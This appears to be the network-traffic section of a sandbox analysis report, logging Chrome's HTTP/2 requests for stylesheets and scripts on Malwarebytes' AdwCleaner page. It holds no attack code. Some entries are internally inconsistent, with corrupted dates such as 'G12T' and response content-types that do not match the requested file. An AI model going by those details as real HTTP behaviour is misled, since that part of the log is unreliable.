                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"21d730b3785ad81:0"
                                                                                                                                                                      last-modified: Wed, 27 Apr 2022 20:52:25 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: pDkUtX5Z6ZMtNoP1UBGihtXSORfFw90bOv_fTdqv0_8eBarJfEa0DQ==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/styles_components.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/styles_components.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      last-modified: Wed, 05 Oct 2022 01:02:17 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"9ac3e71c56d8d81:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: zGxLjt024vBYGNd4_E3GuWOhFVXc-bTQA_kSYNjIbCTkSEVK8SUruw==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/master_page.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/master_page.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      last-modified: Wed, 05 Oct 2022 01:02:30 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"fe10c22456d8d81:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: gAkEPafLKIJud84NX241OCyR2OGBqnAQfy9El4tarEOzU9cnNRZj_A==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/component-project/templates/navwrap/masterpage-svg.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/component-project/templates/navwrap/masterpage-svg.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"c3c2ed1a3dd0d71:0"
                                                                                                                                                                      last-modified: Tue, 02 Nov 2021 22:58:09 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: QtOtuhElZFw7coWftBRLEqkGBnrWuXh-e2YqS7QsBPh3r-UGrG0PIg==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/user-experience/animation/animate-on-scroll.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/user-experience/animation/animate-on-scroll.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"c45b9856e6bd91:0"
                                                                                                                                                                      last-modified: Fri, 09 Dec 2022 15:53:10 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: cRK9vxRMGnvAagMr2Y2x96Np_rxltfhRB5Sdb9wntggqt04F1QKlYA==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/pages/adwcleaner/index.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/pages/adwcleaner/index.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      cache-control: max-age=30
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:02 GMT
                                                                                                                                                                      etag: W/"176845 - 638071491080000000"
                                                                                                                                                                      last-modified: Tue, 20 Dec 2022 16:05:08 G12T
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-aspnet-version: 4.0.30319
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: aBcVQsyWGtB6HkVjjPq3KAN9FjmBeZDEQjXdgIu9mKeZ8blGOZeQgQ==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/__bundle.css?f=L2NvbXBvbmVudHMvaW5zdHJ1Y3Rpb25zL2luc3RydWN0aW9ucy5taW4uY3NzLC9jc3MveW90cG8uY3NzLC9jc3MvdXNlci1leHBlcmllbmNlL2Nhcm91c2VsL3NsaWNrLm1pbi5jc3MsL2Nzcy91c2VyLWV4cGVyaWVuY2UveW90cG8ubWluLmNzcywvY29tcG9uZW50cy90ZXh0LXRlc3RpbW9uaWFscy90ZXh0LXRlc3RpbW9uaWFscy5taW4uY3NzLC9jb21wb25lbnRzL2NvbHVtbnMvY29sdW1ucy5taW4uY3NzLC9jb21wb25lbnRzL2N0YS1jYWxsb3V0L2N0YS1jYWxsb3V0Lm1pbi5jc3MsL2NvbXBvbmVudHMvdGV4dC1vbmx5L3RleHQtb25seS5taW4uY3NzLC9jb21wb25lbnRzL3RocmVlLWNvbHVtbi10ZXh0LXdpdGgtaWNvbi90aHJlZS1jb2x1bW4tdGV4dC13aXRoLWljb24ubWluLmNzc3wxMzRFNUM0QjZFRkZDNTJDNEExMzFGODI2NTlFMEYyMg==
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /__bundle.css?f=L2NvbXBvbmVudHMvaW5zdHJ1Y3Rpb25zL2luc3RydWN0aW9ucy5taW4uY3NzLC9jc3MveW90cG8uY3NzLC9jc3MvdXNlci1leHBlcmllbmNlL2Nhcm91c2VsL3NsaWNrLm1pbi5jc3MsL2Nzcy91c2VyLWV4cGVyaWVuY2UveW90cG8ubWluLmNzcywvY29tcG9uZW50cy90ZXh0LXRlc3RpbW9uaWFscy90ZXh0LXRlc3RpbW9uaWFscy5taW4uY3NzLC9jb21wb25lbnRzL2NvbHVtbnMvY29sdW1ucy5taW4uY3NzLC9jb21wb25lbnRzL2N0YS1jYWxsb3V0L2N0YS1jYWxsb3V0Lm1pbi5jc3MsL2NvbXBvbmVudHMvdGV4dC1vbmx5L3RleHQtb25seS5taW4uY3NzLC9jb21wb25lbnRzL3RocmVlLWNvbHVtbi10ZXh0LXdpdGgtaWNvbi90aHJlZS1jb2x1bW4tdGV4dC13aXRoLWljb24ubWluLmNzc3wxMzRFNUM0QjZFRkZDNTJDNEExMzFGODI2NTlFMEYyMg== HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:02 GMT
                                                                                                                                                                      etag: W/"9e3d46f4b464d81:0"
                                                                                                                                                                      last-modified: Tue, 10 May 2022 21:28:56 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: DRR8OeehDzqSpAGXAW1Cvhi6xBrkWjc1ERgYlgoGUs5vFpXkdosdiQ==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/__bundle.js?f=L2pzL3N0cmluZy9zdHJpbmcubWluLmpzLC9qcy9zZXNzaW9uL3Nlc3Npb24ubWluLmpzLC9qcy9jb3VudHJ5Lm1pbi5qcywvanMvZ2xvYmFsX213Yi5taW4uanMsL2pzL3BlcnNvbmFsaXphdGlvbi91c2VyLm1pbi5qcywvanMvbWVkaWEvaW1hZ2VzL2xhenlsb2FkaW5nLm1pbi5qcywvanMvYm9vdHN0cmFwLm1pbi5qcywvanMvbW9kZXJuaXpyLmpzLC9scC9zZW0vYXNzZXRzL2pzL3Jlc3BvbmQubWluLmpzLC9qcy9nbG9iYWwuanMsL2pzL3hzLm1pbi5qcywvanMvdXNlci1leHBlcmllbmNlL2FuaW1hdGlvbi9hbmltYXRlLW9uLXNjcm9sbC5taW4uanN8MTFBQjcxMjc4MUE2MkQ0MUYwQzM1REExN0E4MzFFNTE=
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /__bundle.js?f=L2pzL3N0cmluZy9zdHJpbmcubWluLmpzLC9qcy9zZXNzaW9uL3Nlc3Npb24ubWluLmpzLC9qcy9jb3VudHJ5Lm1pbi5qcywvanMvZ2xvYmFsX213Yi5taW4uanMsL2pzL3BlcnNvbmFsaXphdGlvbi91c2VyLm1pbi5qcywvanMvbWVkaWEvaW1hZ2VzL2xhenlsb2FkaW5nLm1pbi5qcywvanMvYm9vdHN0cmFwLm1pbi5qcywvanMvbW9kZXJuaXpyLmpzLC9scC9zZW0vYXNzZXRzL2pzL3Jlc3BvbmQubWluLmpzLC9qcy9nbG9iYWwuanMsL2pzL3hzLm1pbi5qcywvanMvdXNlci1leHBlcmllbmNlL2FuaW1hdGlvbi9hbmltYXRlLW9uLXNjcm9sbC5taW4uanN8MTFBQjcxMjc4MUE2MkQ0MUYwQzM1REExN0E4MzFFNTE= HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css; charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      cache-control: max-age=30
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:02 GMT
                                                                                                                                                                      etag: W/"28094 - 638084352580000000"
                                                                                                                                                                      last-modified: Wed, 04 Jan 2023 13:20:58 G1T
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-aspnet-version: 4.0.30319
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: UKvtbl4SNhyOVJrofqdIEEObUMxqQ2bZxw1YExoQLnszBqXMD8pQzQ==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/__bundle.js?f=L2pzL3VzZXItZXhwZXJpZW5jZS9hbmltYXRpb24vYW5pbWF0ZS1vbi1zY3JvbGwubWluLmpzLC9qcy91c2VyLWV4cGVyaWVuY2Uvc2Nyb2xsLm1pbi5qcywvanMvdXNlci1leHBlcmllbmNlL25hdmlnYXRpb24ubWluLmpzfEMwMjFDNzc4NEM5MUNCNTczM0RCODc3REEyMTVERjNE
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /__bundle.js?f=L2pzL3VzZXItZXhwZXJpZW5jZS9hbmltYXRpb24vYW5pbWF0ZS1vbi1zY3JvbGwubWluLmpzLC9qcy91c2VyLWV4cGVyaWVuY2Uvc2Nyb2xsLm1pbi5qcywvanMvdXNlci1leHBlcmllbmNlL25hdmlnYXRpb24ubWluLmpzfEMwMjFDNzc4NEM5MUNCNTczM0RCODc3REEyMTVERjNE HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"8e618b206aedd81:0"
                                                                                                                                                                      last-modified: Mon, 31 Oct 2022 20:48:27 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: kgTLwfUF3eJ7CiHJ8sfosOtV0rVNBzKgvdZpnt3A9BSBrRn9mDP85w==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/utilities.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/utilities.js HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      cache-control: max-age=30
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:02 GMT
                                                                                                                                                                      etag: W/"15987 - 638061971170000000"
                                                                                                                                                                      last-modified: Fri, 09 Dec 2022 15:38:37 G12T
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-aspnet-version: 4.0.30319
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: hShx4VM-aVetMbiGYyLl-DydiXAO7LqhtddFSmvL9RaVvSS65vK0BA==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/pages/masterpage.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/pages/masterpage.min.js HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:28 GMT
                                                                                                                                                                      etag: W/"bd84ecf552eed81:0"
                                                                                                                                                                      last-modified: Wed, 02 Nov 2022 00:35:08 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: O9W7OoVAS2UGv_YnC_BSzADAL9zh9keWaNTIU3TmMAItld-Iw4nezQ==
                                                                                                                                                                      age: 334
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/__bundle.js?f=L2NvbXBvbmVudHMvaW5zdHJ1Y3Rpb25zL2luc3RydWN0aW9ucy5taW4uanMsL2pzL3lvdHBvLXJhdGluZ3MuanMsL2pzL3VzZXItZXhwZXJpZW5jZS9jYXJvdXNlbC9zbGljay5taW4uanMsL2pzL3VzZXItZXhwZXJpZW5jZS95b3Rwby1yYXRpbmdzLm1pbi5qcywvY29tcG9uZW50cy90ZXh0LXRlc3RpbW9uaWFscy90ZXh0LXRlc3RpbW9uaWFscy5taW4uanN8Njg0M0JFMEIzQTdBNjUwRUNCMTlCMzdDNUU2Nzc1QTA=
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /__bundle.js?f=L2NvbXBvbmVudHMvaW5zdHJ1Y3Rpb25zL2luc3RydWN0aW9ucy5taW4uanMsL2pzL3lvdHBvLXJhdGluZ3MuanMsL2pzL3VzZXItZXhwZXJpZW5jZS9jYXJvdXNlbC9zbGljay5taW4uanMsL2pzL3VzZXItZXhwZXJpZW5jZS95b3Rwby1yYXRpbmdzLm1pbi5qcywvY29tcG9uZW50cy90ZXh0LXRlc3RpbW9uaWFscy90ZXh0LXRlc3RpbW9uaWFscy5taW4uanN8Njg0M0JFMEIzQTdBNjUwRUNCMTlCMzdDNUU2Nzc1QTA= HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
